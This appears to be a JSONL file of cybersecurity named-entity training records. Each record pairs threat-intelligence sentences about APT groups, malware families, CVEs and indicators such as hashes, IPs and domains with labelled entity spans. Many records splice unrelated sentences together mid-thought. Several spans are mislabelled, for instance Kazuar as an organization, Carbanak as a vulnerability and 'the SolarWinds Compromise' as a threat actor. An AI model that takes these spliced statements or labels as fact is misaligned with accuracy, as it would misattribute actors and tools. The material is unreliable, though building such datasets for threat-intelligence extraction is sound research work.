{"text": "The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched . The group has been active since at least 2010 and was behind many previous attack campaigns resulting in the theft of massive amounts of data from the directors and managers of US-based defense contractors .", "spans": {"TOOL: Magnitude EK": [[4, 16]], "VULNERABILITY: CVE-2016-0189": [[43, 56]], "ORGANIZATION: FireEye": [[87, 94]], "TOOL: Neutrino Exploit Kit": [[112, 132]], "ORGANIZATION: defense contractors": [[342, 361]]}, "info": {"id": "cyberner_stix_train_000211", "source": "cyberner_stix_train"}}
{"text": "Those permission shown in bold below are the most problematic : Allows an application to write to external storage . More importantly , one of these files also enables the download of TeamViewer , a remote access tool that gives threat actors remote control over the system . APT30 is a threat group suspected to be associated with the Chinese government .", "spans": {"TOOL: TeamViewer": [[184, 194]], "THREAT_ACTOR: threat actors": [[229, 242]], "THREAT_ACTOR: APT30": [[276, 281]], "ORGANIZATION: Chinese government": [[336, 354]]}, "info": {"id": "cyberner_stix_train_000212", "source": "cyberner_stix_train"}}
{"text": "Gaza Cybergang Group 2 , also dubbed Desert Falcons , APT-C-23 , Arid Viper .", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[0, 14]], "THREAT_ACTOR: Desert Falcons": [[37, 51]], "THREAT_ACTOR: APT-C-23": [[54, 62]], "THREAT_ACTOR: Arid Viper": [[65, 75]]}, "info": {"id": "cyberner_stix_train_000213", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have observed BRONZE PRESIDENT batch scripts named doc.bat , xls.bat , xlsx.bat , ppt.bat , pptx.bat , pdf.bat , and txt.bat .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: BRONZE PRESIDENT": [[30, 46]], "FILEPATH: doc.bat": [[67, 74]], "FILEPATH: xls.bat": [[77, 84]], "FILEPATH: xlsx.bat": [[87, 95]], "FILEPATH: ppt.bat": [[98, 105]], "FILEPATH: pptx.bat": [[108, 116]], "FILEPATH: pdf.bat": [[119, 126]], "FILEPATH: txt.bat": [[133, 140]]}, "info": {"id": "cyberner_stix_train_000214", "source": "cyberner_stix_train"}}
{"text": "However , in 2013 , autonomous mobile banking Trojans developed further . One of the attacks used Tropic Trooper 's known Yahoyah malware , but the other attack deployed the widely available Poison Ivy RAT . On all machines the campaign ID matches the name of the targeted university and the C&C URLs are : If you are talking to someone who may be a target of commercial spyware ( i.e. , human rights journalists , activists , dissidents and lawyers )", "spans": {"TOOL: Yahoyah malware": [[122, 137]], "TOOL: C&C": [[292, 295]], "ORGANIZATION: human rights journalists": [[388, 412]], "ORGANIZATION: activists": [[415, 424]], "ORGANIZATION: dissidents": [[427, 437]], "ORGANIZATION: lawyers": [[442, 449]]}, "info": {"id": "cyberner_stix_train_000215", "source": "cyberner_stix_train"}}
{"text": "It expects a json with url , class and method name . The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . However , we have also observed attacks against surrounding nations and beyond , including targets in India and the USA .", "spans": {"THREAT_ACTOR: group": [[57, 62]], "VULNERABILITY: Flash exploits": [[106, 120]], "TOOL: Carberp": [[138, 145]], "TOOL: JHUHUGIT downloaders": [[152, 172]]}, "info": {"id": "cyberner_stix_train_000216", "source": "cyberner_stix_train"}}
{"text": "Originally targeting Western European banks , it has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . From early 2014 until December 2018 , ns0.idm.net.lb pointed to 194.126.10.18 , which appropriately enough is an Internet address based in Lebanon .", "spans": {"ORGANIZATION: banks": [[38, 43]], "TOOL: Emotet": [[162, 168]]}, "info": {"id": "cyberner_stix_train_000217", "source": "cyberner_stix_train"}}
{"text": "eterno truecaller For each application on the list , the “ core ” module checks for a matching version and MD5 hash of the installed application , and also checks for the application running in the user-space . Moreover , they used the same exploit kit Niteris as that in the Corkow case . Based on Microsoft Defender ATP signals , SoftwareBundler : Win32/ICLoader and its variants are primarily used to drop and run the Dexphot B-MAL S-MAL installer . During the SolarWinds Compromise , APT29 used different compromised credentials for remote access and to move laterally .", "spans": {"VULNERABILITY: kit Niteris": [[249, 260]], "TOOL: Corkow": [[276, 282]], "TOOL: Microsoft Defender": [[299, 317]], "MALWARE: SoftwareBundler : Win32/ICLoader": [[332, 364]], "THREAT_ACTOR: the SolarWinds Compromise": [[460, 485]], "THREAT_ACTOR: APT29": [[488, 493]]}, "info": {"id": "cyberner_stix_train_000218", "source": "cyberner_stix_train"}}
{"text": "This was used to bypass 2FA methods by intercepting the SMS messages coming from the bank and stealing the mTANs without the victim ’ s knowledge . We have previously observed APT19 steal data from law and investment firms for competitive economic purposes . Repeated targeting of Middle Eastern financial , energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34 .", "spans": {"THREAT_ACTOR: APT19": [[176, 181]], "ORGANIZATION: financial": [[296, 305]], "ORGANIZATION: energy": [[308, 314]], "ORGANIZATION: government organizations": [[319, 343]], "ORGANIZATION: FireEye": [[350, 357]], "THREAT_ACTOR: APT34": [[412, 417]]}, "info": {"id": "cyberner_stix_train_000219", "source": "cyberner_stix_train"}}
{"text": "The key is the SHA256 hash of the hard-coded password .", "spans": {}, "info": {"id": "cyberner_stix_train_000220", "source": "cyberner_stix_train"}}
{"text": "Standard browser search history Standard browser bookmarks Device handset metadata ; such as brand , display , hardware , manufacturer , product , serial , radio version , and SDK . Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \" [username]=>singleton-instance-mutex \" . It re-copies the DLL from the new buffer to the original one using the memcpy function . CL0P used separate zero - days in GoAnywhere MFT and MOVEit Transfer to gain an edge .", "spans": {"ORGANIZATION: Kazuar": [[182, 188]], "TOOL: DLL": [[340, 343]], "THREAT_ACTOR: CL0P": [[412, 416]], "MALWARE: separate zero - days": [[422, 442]], "TOOL: GoAnywhere MFT": [[446, 460]], "TOOL: MOVEit Transfer": [[465, 480]]}, "info": {"id": "cyberner_stix_train_000221", "source": "cyberner_stix_train"}}
{"text": "This would be a very unusual coincidence . A very good analysis and overview of the BlackEnergy attacks in Ukraine throughout 2014 and 2015 was published by the Ukrainian security firm Cys Centrum the text is only available in Russian for now , but can be read via Google Translate . It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes .", "spans": {"ORGANIZATION: Cys Centrum": [[185, 196]], "THREAT_ACTOR: ScarCruft": [[295, 304]]}, "info": {"id": "cyberner_stix_train_000222", "source": "cyberner_stix_train"}}
{"text": "In subsequent discussion , FireEye personnel indicate that there was not “ an avalanche of evidence to substantiate ” anything more than “ TRITON actor ” – summing matters by indicating this term “ is the best we ’ve got for the public for now ” .", "spans": {"ORGANIZATION: FireEye": [[27, 34]], "MALWARE: TRITON": [[139, 145]]}, "info": {"id": "cyberner_stix_train_000223", "source": "cyberner_stix_train"}}
{"text": "The malicious library is loaded from Eventbot ’ s assets that contain a font file called default.ttf which is actually the hidden library and then decoded using RC4 . However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit (CVE-2018-0798) . APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors .", "spans": {"MALWARE: Eventbot": [[37, 45]], "ORGANIZATION: we": [[205, 207]], "MALWARE: AsyncRAT": [[271, 279]], "THREAT_ACTOR: APT35": [[353, 358]], "ORGANIZATION: military": [[405, 413]], "ORGANIZATION: diplomatic": [[416, 426]], "ORGANIZATION: government personnel": [[431, 451]], "ORGANIZATION: organizations": [[454, 467]], "ORGANIZATION: media": [[475, 480]], "ORGANIZATION: energy": [[483, 489]], "ORGANIZATION: defense industrial base": [[494, 517]], "ORGANIZATION: DIB": [[520, 523]], "ORGANIZATION: engineering": [[532, 543]], "ORGANIZATION: business services": [[546, 563]], "ORGANIZATION: telecommunications sectors": [[568, 594]]}, "info": {"id": "cyberner_stix_train_000224", "source": "cyberner_stix_train"}}
{"text": "Once the Barium Defendants have access to a victim computer through the malware described above , they monitor the victim 's activity and ultimately search for and steal sensitive documents ( for example , exfiltration of intellectual property regarding technology has been seen ) , and personal information fi\"om the victim 's network . CTU researchers have evidence that the threat group compromised U.S. and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations .", "spans": {"ORGANIZATION: technology": [[254, 264], [545, 555]], "ORGANIZATION: CTU": [[338, 341]], "ORGANIZATION: manufacturing": [[457, 470]], "ORGANIZATION: aerospace": [[486, 495]], "ORGANIZATION: defense contractors": [[508, 527]], "ORGANIZATION: automotive": [[532, 542]], "ORGANIZATION: energy": [[558, 564]], "ORGANIZATION: pharmaceuticals": [[571, 586]], "ORGANIZATION: education": [[591, 600]], "ORGANIZATION: legal": [[607, 612]]}, "info": {"id": "cyberner_stix_train_000225", "source": "cyberner_stix_train"}}
{"text": "Based on the leaked code , the RCSAndroid app can do the following intrusive routines to spy on targets : Capture screenshots using the “ screencap ” command and framebuffer direct reading Monitor clipboard content Collect passwords for Wi-Fi networks and online acco ; .unts , including Skype , Facebook , Twitter , Google , WhatsApp , Mail , and LinkedIn Record using the microphone Collect SMS , MMS , and Gmail messages Record location Gather device information Capture photos using the front and back cameras Collect contacts and decode Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . of a function obfuscated with control flow flattening has a loop structure starting with yellow-colored “ control flow dispatcher ” None Follow Microsoft recommendations to disable remote PowerShell for non - administrative users where possible .", "spans": {"MALWARE: RCSAndroid": [[31, 41]], "SYSTEM: Skype": [[288, 293]], "SYSTEM: Facebook": [[296, 304]], "SYSTEM: Twitter": [[307, 314]], "SYSTEM: Google": [[317, 323]], "SYSTEM: WhatsApp": [[326, 334]], "SYSTEM: Mail": [[337, 341]], "SYSTEM: LinkedIn": [[348, 356]], "SYSTEM: Gmail": [[409, 414]], "VULNERABILITY: Carbanak": [[542, 550]], "TOOL: Carberp": [[593, 600]], "THREAT_ACTOR: espionage": [[618, 627]]}, "info": {"id": "cyberner_stix_train_000226", "source": "cyberner_stix_train"}}
{"text": "The sexually explicit images in this screenshot have been covered with a black box . Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using hxxp://voguextra.com/decoy.doc . RASPITE 's activity to date currently focuses on initial access operations within the electric utility sector .", "spans": {"ORGANIZATION: Bellingcat": [[85, 95]], "MALWARE: decoy documents": [[164, 179]], "MALWARE: hxxp://voguextra.com/decoy.doc": [[217, 247]], "THREAT_ACTOR: RASPITE": [[250, 257]], "ORGANIZATION: electric utility sector": [[336, 359]]}, "info": {"id": "cyberner_stix_train_000227", "source": "cyberner_stix_train"}}
{"text": "The download is initiated upon receiving json with a “ download ” command , which includes the URL of the file to be downloaded .", "spans": {}, "info": {"id": "cyberner_stix_train_000228", "source": "cyberner_stix_train"}}
{"text": "Perhaps the most interesting part is that the attack e-mails had an APK attachment – a malicious program for Android . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . This Naikon report will be complemented by a follow-on report that will examine the Naikon TTP and the incredible volume of attack activity around the South China Sea that has been going on since at least 2010 .", "spans": {"SYSTEM: Android": [[109, 116]], "TOOL: PIVY": [[119, 123], [385, 389]], "ORGANIZATION: chemical makers": [[197, 212]], "ORGANIZATION: government agencies": [[215, 234]], "ORGANIZATION: defense contractors": [[237, 256]], "THREAT_ACTOR: attackers": [[327, 336]], "VULNERABILITY: zero-day vulnerability": [[344, 366]], "THREAT_ACTOR: Naikon": [[405, 411], [484, 490]]}, "info": {"id": "cyberner_stix_train_000229", "source": "cyberner_stix_train"}}
{"text": "This technique listens for NBT-NS ( UDP ) broadcasts from victim computers attempting to connect to network resources .", "spans": {"TOOL: NBT-NS": [[27, 33]]}, "info": {"id": "cyberner_stix_train_000230", "source": "cyberner_stix_train"}}
{"text": "THE CAMPAIGN The malware 's primary infection vector is SMS . The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro similarly detailing the use of EvilGrab malware . OceanLotus : 11b4c284b3c8b12e83da0b85f59a589e8e46894fa749b847873ed6bab2029c0f Payload PNG ( loader #2 ) . Threat actors are always looking to expand the strategies they use , thus security practices and solutions that work for less organized cybercriminals might not work for determined groups who are willing to spend time , resources and manpower to accomplish their goals .", "spans": {"THREAT_ACTOR: threat actor": [[66, 78], [222, 234]], "ORGANIZATION: FireEye": [[184, 191]], "TOOL: Poison Ivy malware family": [[249, 274]], "ORGANIZATION: Trend Micro": [[293, 304]], "TOOL: EvilGrab malware": [[336, 352]], "THREAT_ACTOR: OceanLotus": [[355, 365]], "FILEPATH: 11b4c284b3c8b12e83da0b85f59a589e8e46894fa749b847873ed6bab2029c0f": [[368, 432]], "THREAT_ACTOR: Threat actors": [[461, 474]]}, "info": {"id": "cyberner_stix_train_000231", "source": "cyberner_stix_train"}}
{"text": "The attackers described in this document use a very basic delivery platform ; compressed self-extracting archives sometimes sent to a large number of recipients .", "spans": {}, "info": {"id": "cyberner_stix_train_000232", "source": "cyberner_stix_train"}}
{"text": "null is not the only payload opening a shell on the phone . By targeting all of these organizations together , Suckfly could have had a much larger impact on India and its economy . While the majority of infections in this campaign did not originate from Malicious Microsoft Word document , the Cybereason Nocturnus team found several weaponized Microsoft Word document with an embedded downloader macro E-TOOL that downloads and installs the backdoor used in this attack . The intent of cybercriminals may be evaluated during the research stage of the cyberattack kill chain where they investigate potential entry points , and collect data about the company , users and technology systems in place .", "spans": {"TOOL: Malicious Microsoft Word document": [[255, 288]], "ORGANIZATION: Cybereason Nocturnus": [[295, 315]], "TOOL: weaponized Microsoft Word document": [[335, 369]], "TOOL: downloader": [[387, 397]], "TOOL: macro E-TOOL": [[398, 410]], "MALWARE: backdoor": [[443, 451]]}, "info": {"id": "cyberner_stix_train_000233", "source": "cyberner_stix_train"}}
{"text": "The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: military": [[92, 100]], "ORGANIZATION: organizations": [[101, 114]], "VULNERABILITY: CVE-2012-0158": [[198, 211]]}, "info": {"id": "cyberner_stix_train_000234", "source": "cyberner_stix_train"}}
{"text": "In our 2014 report , we identified APT28 as a suspected Russian government-sponsored espionage actor .", "spans": {"THREAT_ACTOR: APT28": [[35, 40]]}, "info": {"id": "cyberner_stix_train_000235", "source": "cyberner_stix_train"}}
{"text": "In some cases , sophisticated web injects were used to trick victims into entering their 2FA codes directly into the web forms controlled by the malware to eliminate the need for the mobile malware component . In order to exfiltrate data from a network segment not connected to the Internet , the threat actor deployed a modified version of hTran . The OilRig group continues to remain a highly active adversary in the Middle East region .", "spans": {"THREAT_ACTOR: threat actor": [[297, 309]], "TOOL: hTran": [[341, 346]], "THREAT_ACTOR: OilRig group": [[353, 365]]}, "info": {"id": "cyberner_stix_train_000236", "source": "cyberner_stix_train"}}
{"text": "The leaked RCSAndroid code is a commercial weapon now in the wild . To ensure remote access to the workstation of an employee at a target organization , the Cobalt group ( as in previous years ) uses Beacon , a Trojan available as part of commercial penetration testing software . The mapping can be created by checking the conditional jump instruction ( jnz ) For these reasons , OT defenders and asset owners should take mitigating actions against COSMICENERGY to preempt in the wild deployment and to better understand common features and capabilities that are frequently deployed in OT malware .", "spans": {"MALWARE: RCSAndroid code": [[11, 26]], "THREAT_ACTOR: Cobalt group": [[157, 169]], "TOOL: Beacon": [[200, 206]], "ORGANIZATION: OT defenders": [[381, 393]], "ORGANIZATION: asset owners": [[398, 410]], "MALWARE: COSMICENERGY": [[450, 462]], "MALWARE: OT malware": [[587, 597]]}, "info": {"id": "cyberner_stix_train_000237", "source": "cyberner_stix_train"}}
{"text": "TA505 stopped distributing Dridex in July 2016 , relying almost exclusively on Locky through December of that year .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "MALWARE: Dridex": [[27, 33]], "MALWARE: Locky": [[79, 84]]}, "info": {"id": "cyberner_stix_train_000238", "source": "cyberner_stix_train"}}
{"text": "In the most extreme case , the Dukes continued with their July 2015 CloudDuke campaign even after their activity had been outed by multiple security vendors .", "spans": {"THREAT_ACTOR: Dukes": [[31, 36]], "MALWARE: CloudDuke": [[68, 77]]}, "info": {"id": "cyberner_stix_train_000239", "source": "cyberner_stix_train"}}
{"text": "TimerTask Figure 6 : The timer task . However , while activity involving known Buckeye tools ceased in mid-2017 , the Bemstour exploit tool and the DoublePulsar variant used by Buckeye continued to be used until at least September 2018 in conjunction with different malware . Sandworm Team is a Russian cyber espionage group that has operated since approximately 2009 .", "spans": {"THREAT_ACTOR: Buckeye": [[79, 86]], "TOOL: Bemstour exploit tool": [[118, 139]], "TOOL: DoublePulsar": [[148, 160]], "THREAT_ACTOR: Sandworm Team": [[276, 289]]}, "info": {"id": "cyberner_stix_train_000240", "source": "cyberner_stix_train"}}
{"text": "While we cannot rule out the possibility that one or more CNIIHM employees could have conducted TEMP.Veles activity without their employer ’s approval , the details shared in this post demonstrate that this explanation is less plausible than TEMP.Veles operating with the support of the institute .", "spans": {"ORGANIZATION: CNIIHM": [[58, 64]], "THREAT_ACTOR: TEMP.Veles": [[96, 106], [242, 252]]}, "info": {"id": "cyberner_stix_train_000241", "source": "cyberner_stix_train"}}
{"text": "Downeks .NET creates a file in the “ Appdata ” directory , based on certain properties of the machine .", "spans": {"MALWARE: Downeks .NET": [[0, 12]]}, "info": {"id": "cyberner_stix_train_000242", "source": "cyberner_stix_train"}}
{"text": "The social engineering message includes a link that leads to a fake version of a popular app , using names like Runtastic , WhatsApp or Netflix . This campaign , first observed in 2010 , is believed to be operated by a well-funded group given how it appeared to have purchased the source code of the BIFROST backdoor , which the operators enhanced and created other tools from . This page used to offer no-ip type hosting and was widely used by malware authors . A browser redirects to this page but search engines do n't update their links to the resource ( in ' SEO - speak ' , it is said that the ' link - juice ' is not sent to the new URL ) .", "spans": {"SYSTEM: Runtastic": [[112, 121]], "SYSTEM: WhatsApp": [[124, 132]], "SYSTEM: Netflix": [[136, 143]], "TOOL: browser": [[465, 472]]}, "info": {"id": "cyberner_stix_train_000243", "source": "cyberner_stix_train"}}
{"text": "The first CosmicDuke sample we observed after the initial research on CosmicDuke was a sample compiled on the 30th of July 2014 .", "spans": {"MALWARE: CosmicDuke": [[10, 20], [70, 80]]}, "info": {"id": "cyberner_stix_train_000244", "source": "cyberner_stix_train"}}
{"text": "The /proc filesystem is now mounted with a hidepid=2 parameter , which means that the process can not access other process /proc/ [ pid ] directory . The attacks appear to be geopolitically motivated and target high profile organizations . A URL is randomly selected and the malware searches at that location for an encoded IP address located between two tags , “ @MICR0S0FT ” and “ C0RP0RATI0N ” . Once the infected system locates the C2 , it receives encrypted backdoors that are obfuscated within GIF files and disguised as pictures that appear on a victim - s machine .", "spans": {"ORGANIZATION: high profile organizations": [[211, 237]], "ORGANIZATION: infected system": [[408, 423]], "SYSTEM: C2": [[436, 438]]}, "info": {"id": "cyberner_stix_train_000245", "source": "cyberner_stix_train"}}
{"text": "The Sogu gang , in contrast , use PDF and DOC files in very tailored , targeted emails .", "spans": {"ORGANIZATION: Sogu": [[4, 8]], "TOOL: PDF": [[34, 37]], "TOOL: DOC": [[42, 45]], "TOOL: emails": [[80, 86]]}, "info": {"id": "cyberner_stix_train_000246", "source": "cyberner_stix_train"}}
{"text": "Extract the contacts list from the Facebook app . The Remsec malware used by Strider has a modular design . This backdoor allows attackers to spy on targeted victims . This includes hosting C&C domains that were used by Winnti such as mtrue.com , shenqi[.]kr and zhu[.]kr .", "spans": {"SYSTEM: Facebook app": [[35, 47]], "TOOL: Remsec malware": [[54, 68]], "THREAT_ACTOR: Strider": [[77, 84]], "MALWARE: backdoor": [[113, 121]]}, "info": {"id": "cyberner_stix_train_000247", "source": "cyberner_stix_train"}}
{"text": "Further research found other Quasar examples , an attack earlier in the month 2016 on the same target :", "spans": {"MALWARE: Quasar": [[29, 35]]}, "info": {"id": "cyberner_stix_train_000248", "source": "cyberner_stix_train"}}
{"text": "Figure 7 . All three waves involved a single spear phishing email that appeared to originate from a government agency based in the Middle East . ' 0401 ' : Saudi Arabia . ' 0801 ' : Iraq . ' 0c01 ' : Egypt . ' 1001 ' : Libya . ' 1401 ' : Algeria . ' 1801 ' : Morocco . ' 1c01 ' : Tunisia . ' 2001 ' : Oman . ' 2401 ' : Yemen . ' 2801 ' : Syria . ' 3801 ' : UAE . ' 3401 ' : Kuwait . ' 3c01 ' : Bahrain . ' 3001 ' : Lebanon . But , IOCs are not always easy to detect they can be as simple as metadata elements or incredibly complex malicious code and content samples .", "spans": {"ORGANIZATION: government agency": [[100, 117]]}, "info": {"id": "cyberner_stix_train_000249", "source": "cyberner_stix_train"}}
{"text": "Corporate IoT – a path to intrusion .", "spans": {"TOOL: IoT": [[10, 13]]}, "info": {"id": "cyberner_stix_train_000250", "source": "cyberner_stix_train"}}
{"text": "These devices became points of ingress from which the actor established a presence on the network and continued looking for further access .", "spans": {}, "info": {"id": "cyberner_stix_train_000251", "source": "cyberner_stix_train"}}
{"text": "The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry . Dropbox has already taken down the links .", "spans": {"ORGANIZATION: companies": [[60, 69]], "ORGANIZATION: video game and software development industry": [[89, 133]], "TOOL: Dropbox": [[136, 143]]}, "info": {"id": "cyberner_stix_train_000252", "source": "cyberner_stix_train"}}
{"text": "Additional language artifacts recovered from TEMP.Veles toolsets are also consistent with such a regional nexus .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[45, 55]]}, "info": {"id": "cyberner_stix_train_000253", "source": "cyberner_stix_train"}}
{"text": "We surmise that the targeting of banks , media , and government agencies is conducted in support of APT38 's primary mission . We named it RedOctober because we started this investigation in October 2012 , an unusually hot month .", "spans": {"ORGANIZATION: banks": [[33, 38]], "ORGANIZATION: media": [[41, 46]], "ORGANIZATION: government agencies": [[53, 72]], "THREAT_ACTOR: APT38": [[100, 105]]}, "info": {"id": "cyberner_stix_train_000254", "source": "cyberner_stix_train"}}
{"text": "In an e-mail , a Lookout representative stood by its analysis and said company researchers planned to publish an in-depth response in the coming days . Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government – commonly known as HARDRAIN . APT33 : 91.230.121.143 backupnet.ddns.net . The ads are very similar to other brand impersonation campaigns .", "spans": {"ORGANIZATION: Lookout": [[17, 24]], "ORGANIZATION: U.S. Government": [[165, 180]], "ORGANIZATION: DHS": [[192, 195]], "ORGANIZATION: FBI": [[200, 203]], "TOOL: Trojan malware": [[215, 229]], "TOOL: HARDRAIN": [[295, 303]], "THREAT_ACTOR: APT33": [[306, 311]], "IP_ADDRESS: 91.230.121.143": [[314, 328]], "DOMAIN: backupnet.ddns.net": [[329, 347]]}, "info": {"id": "cyberner_stix_train_000255", "source": "cyberner_stix_train"}}
{"text": "Shamoon2 : 83be35956e5d409306a81e88a1dc89fd .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "FILEPATH: 83be35956e5d409306a81e88a1dc89fd": [[11, 43]]}, "info": {"id": "cyberner_stix_train_000256", "source": "cyberner_stix_train"}}
{"text": "Command Description SEND_SMS Send an SMS from the bot to a specific number NEW_URL Update the C2 URL KILL Disable the bot PING_DELAY Update interval between each ping request CLEAN_IGNORE_PKG Empty list of overlayed apps WRITE_INJECTS Update target list READ_INJECTS Get current target list START_ADMIN Request Device Admin privileges ALL_SMS Get all SMS messages DISABLE_ACCESSIBILITY Stop preventing user from disabling the accessibility service ENABLE_ACCESSIBILITY Prevent user from disabling Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds , if not thousands , of corporations around the world . The samples of Daserf that shared infrastructure were submitted to VirusTotal only from Japan multiple times in 2013 .", "spans": {"THREAT_ACTOR: MSS": [[570, 573]], "MALWARE: Daserf": [[704, 710]], "ORGANIZATION: VirusTotal": [[756, 766]]}, "info": {"id": "cyberner_stix_train_000257", "source": "cyberner_stix_train"}}
{"text": "10002500: NvMswt 10002860: NvReg 10002880: NvStart 10002A80: NvStop This library is a newer version of the file collection module ( md5: 0369620eb139c3875a62e36bb7abdae8 ) wrapped in a DLL file .", "spans": {"FILEPATH: 0369620eb139c3875a62e36bb7abdae8": [[137, 169]], "TOOL: DLL": [[185, 188]]}, "info": {"id": "cyberner_stix_train_000258", "source": "cyberner_stix_train"}}
{"text": "Nevertheless , Windows Defender ATP also supports blocking the implant across the entire enterprise , stopping large-scale intrusions in the early stages .", "spans": {"TOOL: Windows Defender ATP": [[15, 35]]}, "info": {"id": "cyberner_stix_train_000259", "source": "cyberner_stix_train"}}
{"text": "The first are games of very low quality that mimic the experience of popular mobile games . This program is designed to capture keystrokes , take screenshots of the user 's desktop and get contents from the clipboard . To retrieve commands , ELMER sends HTTP GET requests to a hard-coded C2 server , and parses the HTTP response packets received from the C2 server for an integer string corresponding to the command that needs to be executed . Our researchers recently discovered a threat actor conducting several campaigns against government entities , military organizations and civilian users in Ukraine and Poland .", "spans": {"MALWARE: ELMER": [[242, 247]], "TOOL: C2": [[288, 290], [355, 357]], "ORGANIZATION: government entities": [[532, 551]], "ORGANIZATION: military organizations": [[554, 576]], "ORGANIZATION: civilian users": [[581, 595]]}, "info": {"id": "cyberner_stix_train_000260", "source": "cyberner_stix_train"}}
{"text": "Sofacy is a group dedicated to the compromise of high-profile targets and the theft of confidential information .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]]}, "info": {"id": "cyberner_stix_train_000261", "source": "cyberner_stix_train"}}
{"text": "Observe and look at the app ’ s display and text , stated functions , reviews from other users , and requested permissions before downloading . APT38 's increasingly aggressive targeting against banks . Additional jump instructions are supported when collecting block comparison variable candidates and mapping between the variable and ea or block number ( jnz/jle in JZCollector , The syntax of the command fragment includes “ scilc.exe ” , a native utility that is part of the MicroSCADA software suite .", "spans": {"THREAT_ACTOR: APT38": [[144, 149]], "ORGANIZATION: banks": [[195, 200]], "TOOL: JZCollector": [[368, 379]]}, "info": {"id": "cyberner_stix_train_000262", "source": "cyberner_stix_train"}}
{"text": "f1e2bceae81ccd54777f7862c616f22b581b47e0dda5cb02d0a722168ef194a5 fc69fb278e12fc7f9c49a020eff9f84c58b71e680a9e18f78d4e6540693f557d .", "spans": {"FILEPATH: f1e2bceae81ccd54777f7862c616f22b581b47e0dda5cb02d0a722168ef194a5": [[0, 64]], "FILEPATH: fc69fb278e12fc7f9c49a020eff9f84c58b71e680a9e18f78d4e6540693f557d": [[65, 129]]}, "info": {"id": "cyberner_stix_train_000263", "source": "cyberner_stix_train"}}
{"text": "To infect individuals with access to the data the actors desire , Scarlet Mimic deploys both spear-phishing and watering hole ( strategic web compromise ) attacks . The attacker is from North Korea .", "spans": {"THREAT_ACTOR: actors": [[50, 56]], "THREAT_ACTOR: Scarlet Mimic": [[66, 79]]}, "info": {"id": "cyberner_stix_train_000264", "source": "cyberner_stix_train"}}
{"text": "Allows an application to read the user 's contacts data . Despite iPhone's minority share (14.5%) of the global smart phone market in 2016 , a specialized unit in the CIA's Mobile Development Branch produces malware to infest , control and exfiltrate data from iPhones and other Apple products running iOS , such as iPads . FIN7 is sometimes referred to as Carbanak Group , but these appear to be two groups using the same Carbanak malware and are therefore tracked separately .", "spans": {"THREAT_ACTOR: CIA's": [[167, 172]], "TOOL: iPhones": [[261, 268]], "TOOL: Apple": [[279, 284]], "TOOL: iOS": [[302, 305]], "TOOL: iPads": [[316, 321]], "THREAT_ACTOR: FIN7": [[324, 328]], "THREAT_ACTOR: Carbanak Group": [[357, 371]], "MALWARE: Carbanak": [[423, 431]]}, "info": {"id": "cyberner_stix_train_000265", "source": "cyberner_stix_train"}}
{"text": "In other cases , threat actors placed web shells on externally accessible servers , sometimes behind a reverse proxy , to execute commands on the compromised system .", "spans": {"TOOL: web shells": [[38, 48]]}, "info": {"id": "cyberner_stix_train_000266", "source": "cyberner_stix_train"}}
{"text": "We believe the formation of the first of these botnets began in January 2014 , using both unidentified infection vectors and the known malicious Tor node , and continued until our blogpost was published in November .", "spans": {"TOOL: Tor": [[145, 148]]}, "info": {"id": "cyberner_stix_train_000267", "source": "cyberner_stix_train"}}
{"text": "Despite the public reporting and government accusations , SNAKEMACKEREL remains highly active .", "spans": {"THREAT_ACTOR: SNAKEMACKEREL": [[58, 71]]}, "info": {"id": "cyberner_stix_train_000268", "source": "cyberner_stix_train"}}
{"text": "This alert includes technical indicators related to specific North Korean government cyber operations and provides suggested response actions to those indicators , recommended mitigation techniques , and information on reporting incidents to the U.S. Government .", "spans": {"ORGANIZATION: government": [[74, 84]], "ORGANIZATION: Government": [[251, 261]]}, "info": {"id": "cyberner_stix_train_000269", "source": "cyberner_stix_train"}}
{"text": "During one intrusion , the threat actors installed it on over 70% of accessible hosts .", "spans": {}, "info": {"id": "cyberner_stix_train_000270", "source": "cyberner_stix_train"}}
{"text": "The challenge is detecting known good software loading and running malware .", "spans": {}, "info": {"id": "cyberner_stix_train_000271", "source": "cyberner_stix_train"}}
{"text": "Several of the decoy files appeared to be official documents associated with the Palestinian Authority – the body that governs the Palestinian Territories in the Middle East .", "spans": {"ORGANIZATION: Palestinian Authority": [[81, 102]]}, "info": {"id": "cyberner_stix_train_000272", "source": "cyberner_stix_train"}}
